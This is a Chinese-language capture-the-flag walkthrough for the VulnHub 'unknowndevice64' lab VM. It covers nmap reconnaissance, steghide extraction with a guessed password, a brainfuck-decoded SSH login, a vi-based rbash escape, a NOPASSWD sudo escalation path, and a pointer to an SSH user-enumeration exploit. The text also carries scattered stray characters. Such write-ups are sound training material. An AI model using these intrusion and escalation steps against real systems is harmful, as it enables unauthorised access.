[unknowndevice64: 1]下載地址:https://www.vulnhub.com/entry/unknowndevice64-1,293/
target:獲取機(jī)器root權(quán)限,查看/root/flag.txt
1.鏡像本間導(dǎo)入VMware智末;(nat模式,鏡像默認(rèn)啟用DHCP温学,kaili也在同網(wǎng)段(192.168.80.0/24));
2.掃描網(wǎng)段,獲取靶機(jī)IP
root@kali:/home/ud64# nmap -sn 192.168.80.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-15 01:43 EDT
Nmap scan report for 192.168.80.1
Host is up (0.00042s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.80.134
Host is up (0.0011s latency).
MAC Address: 00:0C:29:D4:9F:79 (VMware)
Nmap scan report for 192.168.80.254
Host is up (0.00015s latency).
MAC Address: 00:50:56:EA:7D:F3 (VMware)
Nmap scan report for 192.168.80.132
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 7.97 seconds
3.nmap掃描靶機(jī)氓奈,查看活動(dòng)端口
root@kali:/home/ud64# nmap -p- -sS -sV 192.168.80.134
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-15 00:00 EDT
Nmap scan report for 192.168.80.134
Host is up (0.00060s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
1337/tcp open ssh OpenSSH 7.7 (protocol 2.0)
31337/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14)
MAC Address: 00:0C:29:D4:9F:79 (VMware)
顯示靶機(jī)ssh端口為1337,另外靶機(jī)為http server瞬欧,端口為31337;
4.web登錄192.168.80.134:31337,開發(fā)者模式查看網(wǎng)頁源碼罢防;
看到如下文件key_is_h1dd3n.jpg艘虎,提示key藏在這個(gè)jpg圖片中;
下載圖片到kali
wget http://192.168.80.134:31337/key_is_h1dd3n.jpg
5.使用Steghide查實(shí)破解圖片隱藏的信息咒吐;關(guān)于Steghide的信息可以自行g(shù)oogle野建;
root@kali:/home/ud64# apt-get install steghide #非kali自帶,安裝steghide
root@kali:/home/ud64# steghide --extract -sf key_is_h1dd3n.jpg -p h1dd3n #steghide解密要使用原來加密使用的密碼恬叹,密碼根據(jù)圖片名字猜測候生,運(yùn)氣不錯(cuò)h1dd3n是密碼
wrote extracted data to "h1dd3n.txt".
root@kali:/home/ud64# cat h1dd3n.txt #查看解密文件
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++++++++++++++.-----------------.<----------------.--.++++++.---------.>-----------------------.<<+++.++.>+++++.--.++++++++++++.>++++++++++++++++++++++++++++++++++++++++.-----------------.
6.文件信息為一種brainfuck的程序語言,使用在線工具可解https://copy.sh/brainfuck/绽昼,在線解密后即可獲取到ssh的用戶名和密碼唯鸭;
7.登錄靶機(jī)ssh ****@192.168.80.134 -p 1337
(為不劇透,隱去了登錄用戶名)
8.登錄發(fā)現(xiàn)為非root用戶绪励,需要提權(quán)
ud64@unknowndevice64_v1:~$ ls
-rbash: /bin/ls: restricted: cannot specify `/' in command names
ud64@unknowndevice64_v1:~$ sudo -l
-rbash: sudo: command not found
9.按兩次tab鍵肿孵,顯示目前用戶可執(zhí)行的命令
ud64@unknowndevice64_v1:~$
! ]] builtin compgen date done esac false function id let mc read set test true unalias while
./ alias caller complete declare echo eval fc getopts if local popd readarray shift then type unset whoami
: bg case compopt dirs elif exec fg hash in logout printf readonly shopt time typeset until {
[ bind cd continue disown else exit fi help jobs ls pushd return source times ulimit vi }
[[ break command coproc do enable export for history kill mapfile pwd select suspend trap umask wait
發(fā)現(xiàn)可以使用vi,通過vi可以突破受限的shell
sh-4.4$ export PATH=/bin:/usr/bin:$PATH #修改環(huán)境變量
sh-4.4$ cat flagRoot.txt #這步已經(jīng)可以查看flag文件了
sh-4.4$ sudo -l #這里可以發(fā)現(xiàn)一個(gè)有趣的東西疏魏,通過/usr/bin/sysud64可以執(zhí)行任何root權(quán)限的命令
User ud64 may run the following commands on unknowndevice64_v1:
(ALL) NOPASSWD: /usr/bin/sysud64
使用到的工具:
nmap
steghide 開源隱寫程序
brainfuck 程序語言
ssh用戶名枚舉(https://www.exploit-db.com/exploits/45939
)代碼35行需要修改sock.connect((args.target, int(args.port)))
使用方式python ssh_enum_user.py -p 1337 192.168.80.134 root